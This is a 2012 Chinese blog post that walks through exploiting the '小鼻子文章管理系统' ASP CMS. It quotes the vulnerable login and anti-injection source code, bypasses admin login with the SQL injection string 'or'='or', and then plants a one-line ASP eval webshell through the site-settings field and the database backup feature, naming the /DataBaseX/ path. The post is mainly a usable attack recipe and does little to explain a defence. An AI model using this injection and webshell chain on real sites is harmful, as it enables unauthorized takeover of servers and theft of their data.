注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

龙少'Blog

 

 
 
 

日志

 
 

小鼻子文章管理系统漏洞  

2012-07-28 18:06:15|  分类: OADY |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

从A5网站上 随便下了一个asp的建站系统 “小鼻子文章管理系统”
打开以后 发现做的还不错
来到后台/admin/login.asp  默认试了一下万能密码 'or'='or'  发现竟然进去了
来看一下源码
① login.asp文件
<%
Dim errmsg
 
username=Request("username")
password=Request("password")
verifycode=Request("verifycode")
 
If username="" Or password="" Then
Response.Redirect "login.asp?errno=2"
Response.End
End If

这是一处。发现没有过滤然后是  奇怪的竟然在 验证码这转化。
If Cstr(Session("getcode"))<>Lcase(Cstr(Trim(Request("verifycode")))) Then
Response.Redirect "login.asp?errno=0"
Response.End
End If
 
%>

来看一下 防注入文件/inc/AntiAttack.asp分两部分组成
①----- 对 get query 值 的过滤.
②-----对 post 表 单值的过滤.
对post的代码如下
if request.form<>"" then
Chk_badword=split(Form_Badword,"‖")
FOR EACH form_name2 IN Request.Form
for i=0 to ubound(Chk_badword)
If Instr(LCase(request.form(form_name2)),Chk_badword(i))<>0 Then
Select Case Err_Message
Case "1"
Response.Write "<Script Language=JavaScript>alert('出错了!表单 "&form_name2&" 的值中包含非法字符串!\n\n请不要在表单中出现: % & * # ( ) 等非法字符!');window.close();</Script>"
Case "2"
Response.Write "<Script Language=JavaScript>location.href='"&Err_Web&"'</Script>"
Case "3"
Response.Write "<Script Language=JavaScript>alert('出错了!参数 "&form_name2&"的值中包含非法字符串!\n\n请不要在表单中出现: % & * # ( ) 等非法字符!');location.href='"&Err_Web&"';</Script>"
End Select
Response.End
End If
NEXT
NEXT
end if
%>
开头"if request.from<>"
很显然 在后台登陆界面 的 用户和密码处并没有进行判断
所以使用万能密码 可以直接登陆后台

 二 、 后台上传shell
我简单的看了一下 可以用备份 的方法
 
首先 先对网站进行 备份 后面 还原用到
在“网站信息设置”出我们插上 闭合型一句话
%><%eval request("0o1Znz1ow")%><%
然后备份 xx.asp or xx.cer 等
在 /DataBaseX/文件下 会出现我们的马了

  评论这张
 
阅读(68)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017